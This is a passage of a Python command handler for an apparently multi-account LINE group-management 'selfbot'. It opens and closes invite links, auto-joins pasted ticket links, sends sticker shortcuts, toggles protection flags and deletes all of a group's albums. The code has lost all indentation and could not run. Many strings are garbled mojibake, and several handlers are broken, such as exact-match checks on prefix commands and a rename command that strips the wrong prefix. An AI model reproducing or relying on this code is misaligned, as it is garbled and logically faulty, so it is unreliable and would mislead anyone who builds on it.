elif msg.text in ["Kr3 ourl","Kr3 link on"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Curl","Link off","Urloff"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr1 curl","Kr1 link off"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr2 curl","Kr2 link off"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr3 curl","Kr3 link off"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
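# "jointicket on/off" toggles wait["atjointicket"]; while it is on, any line.me/ti/g/ ticket link pasted in chat is joined automatically by the handler below.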
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ","")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
#--------------------------------------------------
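# "Ginfo": report group name, id, creator, picture URL, member count, pending invites and whether the invite URL is open.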
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif "Id" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,msg.to)
#--------------------------------------------------
elif "All mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,mid)
cl.sendText(msg.to,Amid)
cl.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
#--------------------------------------------------
elif "Mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,mid)
#--------------------------------------------------
elif "Kr1 mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,Amid)
#--------------------------------------------------
elif "Kr2 mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,Bmid)
#--------------------------------------------------
elif "Kr3 mid" == msg.text:
if msg.from_ in admin or owner:
kc.sendText(msg.to,Cmid)
#--------------------------------------------------
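# Sticker shortcuts: each keyword below makes the helper bots send a fixed sticker from package 1 (package 3 for "Come").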
elif msg.text in ["Wkwk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Hehehe"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galon"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Hmmm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Come"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["TL "]:
if msg.from_ in admin or owner:
tl_text = msg.text.replace("TL ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#--------------------------------------------------
elif msg.text in ["Undang"]:
if msg.from_ in admin or owner:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#--------------------------------------------------
elif msg.text in ["Kr1 rename "]:
if msg.from_ in admin or owner:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
cl.sendText(msg.to,"name " + string + " done")
#--------------------------------------------------
elif msg.text in ["Kr2 rename "]:
if msg.from_ in admin or owner:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
cl.sendText(msg.to,"name " + string + " done")
#--------------------------------------------------
elif msg.text in ["Mc "]:
if msg.from_ in admin or owner:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Guest On","guest on"]:
if msg.from_ in admin or owner:
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["Guest Off","guest off"]:
if msg.from_ in admin or owner:
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
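# Feature toggles: each handler below flips a flag in wait{} ("contact", "autoJoin", autoCancel, "leaveRoom", "timeline", "autoAdd", ...) and confirms according to wait["lang"].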
elif msg.text in ["連絡åâ�1�7�1�71¤7¦Ë 1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","K on","Contact on","顯示:éâ€�1�7�â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["連絡åâ�1�7�1�71¤7¦Ë 1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","K off","Contact off","顯示:éâ€�1�7�Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥Ââ 1�71¤7šÃ¥Å 1�71¤7 :オãÆ�1�7�Â�1�7�1�71¤7","Join on","Auto join:on","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥ÂÆ’Ã¥Å�1�7�1�71¤7 :éâ€�1�7�â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥Ââ 1�71¤7šÃ¥Å 1�71¤7 :オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Join off","Auto join:off","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥ÂÆ’Ã¥Å�1�7�1�71¤7 :éâ€�1�7�Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["Gcancel:"]:
if msg.from_ in admin or owner:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"å…³äºâ�1�7�1�71¤7 éâ 1�71¤7šâ‚¬Ã¨Â¯Â·Ã¦â€¹â 1�71¤7™Ã§Â»Âãâ�1�7�¬â€šÃ¨Â¦Âæâ 1�71¤7”¶å¼â�1�7�¬Ã¨Â¯Â·Ã¦Å�1�7�‡å®šäººæâ 1�71¤7¢Â°Ã¥Ââ 1�71¤7˜Ã©â‚¬Â1�7")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + " members or fewer: group invitations will now be refused automatically")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
#--------------------------------------------------
elif msg.text in ["強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡Â 1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","Leave on","Auto leave:on","強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡ÂºÃ¯Â¼Å¡Ã©â 1�71¤7“â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡Â 1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Leave off","Auto leave:off","強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡ÂºÃ¯Â¼Å¡Ã©â 1�71¤7”Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#--------------------------------------------------
elif msg.text in ["å…±æÅ�1�7�â�1�7�1�71¤7 1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","Share on","Share on"]:
if msg.from_ in admin or owner:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["å…±æÅ�1�7�â�1�7�1�71¤7 1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Share off","Share off"]:
if msg.from_ in admin or owner:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了åâ�1�7�1�71¤7¦Â³Ã¦â 1�71¤7“Âãâ�1�7�¬â€ 1�71¤7")
#--------------------------------------------------
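# "Set"/"Status": reply with the on/off state of every protection and toggle flag kept in wait{}.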
elif msg.text in ["Set","Status"]:
if msg.from_ in admin or owner:
md = ""
if wait["contact"] == True: md+="[Mask] CONTACT : [✅]\n"
else: md+="[Mask] CONTACT : [❌]\n"
if wait["autoJoin"] == True: md+="[Mask] AUTOJOIN : [✅]\n"
else: md +="[Mask] AUTOJOIN : [❌]\n"
if wait["autoCancel"]["on"] == True:md+="[Mask] GROUP CANCEL :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+="[Mask] GROUP CANCEL : [❌]\n"
if wait["leaveRoom"] == True: md+="[Mask] AUTOLEAVE : [✅]\n"
else: md+="[Mask] AUTOLEAVE : [❌]\n"
if wait["timeline"] == True: md+="[Mask] SHARE : [✅]\n"
else:md+="[Mask] SHARE : [❌]\n"
if wait["autoAdd"] == True: md+="[Mask] AUTOADD : [✅]\n"
else:md+="[Mask] AUTOADD : [❌]\n"
if wait["commentOn"] == True: md+="[Mask] COMMENT : [✅]\n"
else:md+="[Mask] COMMENT : [❌]\n"
if wait["likeOn"] == True: md+="[Mask] AUTOLIKE : [✅]\n"
else:md+="[Mask] AUTOLIKE : [❌]\n"
if wait["QrProtect"] == True: md+="[Mask] PROTECT QR : [✅]\n"
else:md+="[Mask] PROTECT QR : [❌]\n"
if wait["MProtection"] == True:md+="[Mask] PROTECT MEMBER : [✅]\n"
else:md+="[Mask] PROTECT MEMBER : [❌]\n"
if wait["Protectguest"] == True:md+="[Mask] PROTECT GUEST : [✅]\n"
else:md+="[Mask] PROTECT GUEST : [❌]\n"
if wait["Protectcancel"] == True:md+="[Mask] PROTECT CANCEL : [✅]\n"
else:md+="[Mask] PROTECT CANCEL : [❌]\n"
if wait["autoKick"] == True:md+="[Mask] PROTECT KICK : [✅]\n"
else:md+="[Mask] PROTECT KICK : [❌]\n"
if wait["Wc"] == True: md+="[Mask] WELCOME : [✅]\n"
else:md+="[Mask] WELCOME : [❌]\n"
if wait["Lv"] == True: md+="[Mask] LEAVE : [✅]\n"
else:md+="[Mask] LEAVE : [❌]\n"
if wait["tag"] == True: md+="[Mask] TAG 1 : [✅]\n"
else:md+="[Mask] TAG 1 : [❌]\n"
if wait["tag2"] == True: md+="[Mask] TAG 2 : [✅]\n"
else:md+="[Mask] TAG 2 : [❌]\n"
if wait["auto"] == True: md+="[Mask] AutoBot Join : [✅]\n"
else:md+="[Mask] AutoBot Join : [❌]\n"
cl.sendText(msg.to,md)
#--------------------------------------------------
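# Album helpers: "album merit <gid>" and "album <gid>" list a group's albums with photo counts; "album remove <gid>" deletes them all.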
elif "album merit " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相åâ�1�7�1�71¤7 Œæ²¡åÅ�1�7�¨ãâ�1�7�¬â€ 1�71¤7")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象çšâ�1�7�1�71¤7žÃ§â 1�71¤7ºÂ¸Ã¥â 1�71¤7 Å 1�71¤7"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
#--------------------------------------------------
elif "album " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相åâ�1�7�1�71¤7 Œæ²¡åÅ�1�7�¨ãâ�1�7�¬â€ 1�71¤7")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象çšâ�1�7�1�71¤7žÃ§â 1�71¤7ºÂ¸Ã¥â 1�71¤7 Å 1�71¤7"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
#--------------------------------------------------
elif "album remove " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + " albums deleted")
elif msg.text in ["Group id","群組åâ�1�7�1�71¤7¦Â¨id"]:
if msg.from_ in admin or owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------------------------------------------
elif msg.text in ["Clear"]:
if msg.from_ in admin or owner:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹â�1�7�1�71¤7™Ã§Â»Âäºâ�1�7�1�71¤7 Ã¥â 1�71¤7¦Â¨Ã©Æ’¨çšâ�1�7�1�71¤7žÃ©â 1�71¤7šâ‚¬Ã¨Â¯Â·Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif "album removeâ†â�1�7�1�71¤7 1�71¤7" in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album removeâ†â�1�7�1�71¤7 1�71¤7","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + " albums deleted")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :オãÆ�1�7�Â�1�7�1�71¤7","Add on","Auto add:on","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :éâ€�1�7�â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Add off","Auto add:off","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :éâ€�1�7�Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了åâ�1�7�1�71¤7¦Â³Ã¦â 1�71¤7“Âãâ�1�7�¬â€ 1�71¤7")
#--------------------------------------------------
elif "Message change: " in msg.text:
if msg.from_ in admin or owner:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
if msg.from_ in admin or owner:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"doneã€â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["Message","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 å•ÂÃ¥â�1�7�¬â�1�7�¢Ã¨ÂªÅ¾Ã§Â¢ÂºÃ¨ÂªÂ�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as followsã€â�1�7�1�71¤7š\n\n" + wait["message"])
#--------------------------------------------------
elif "Comment:" in msg.text:
if msg.from_ in admin or owner:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#--------------------------------------------------
elif "Add comment:" in msg.text:
if msg.from_ in admin or owner:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["コãÆ�1�7�¡ãÆ�1�7�³ãÆ�1�7�Ë�1�7�1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","Comment on","Comment:on","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã©Â¦â 1�71¤7“Ã�1�7�1�71¤7 Âç•â�1�7�¢Ã¨Â¨â�1�7�¬Ã¯Â¼Å¡Ã©â�1�7�1�71¤7“â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
elif msg.text in ["コãÆ�1�7�¡ãÆ�1�7�³ãÆ�1�7�Ë�1�7�1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Comment on","Comment off","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã©Â¦â 1�71¤7“Ã�1�7�1�71¤7 Âç•â�1�7�¢Ã¨Â¨â�1�7�¬Ã¯Â¼Å¡Ã©â�1�7�1�71¤7”Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了åâ�1�7�1�71¤7¦Â³Ã¦â 1�71¤7“Âãâ�1�7�¬â€ 1�71¤7")
elif msg.text in ["Comment","ç•â�1�7�¢Ã¨Â¨â�1�7�¬Ã§Â¢ÂºÃ¨ÂªÂ�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Kr1 gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Kr2 gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Kr3 gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
if msg.from_ in admin or owner:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
if msg.from_ in admin or owner:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if msg.from_ in admin or owner:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Jam on"]:
if msg.from_ in admin or owner:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Jam off"]:
if msg.from_ in admin or owner:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
if msg.from_ in admin or owner:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if msg.from_ in admin or owner:
if wait["clock"] == True:
now2 = datetime.now()
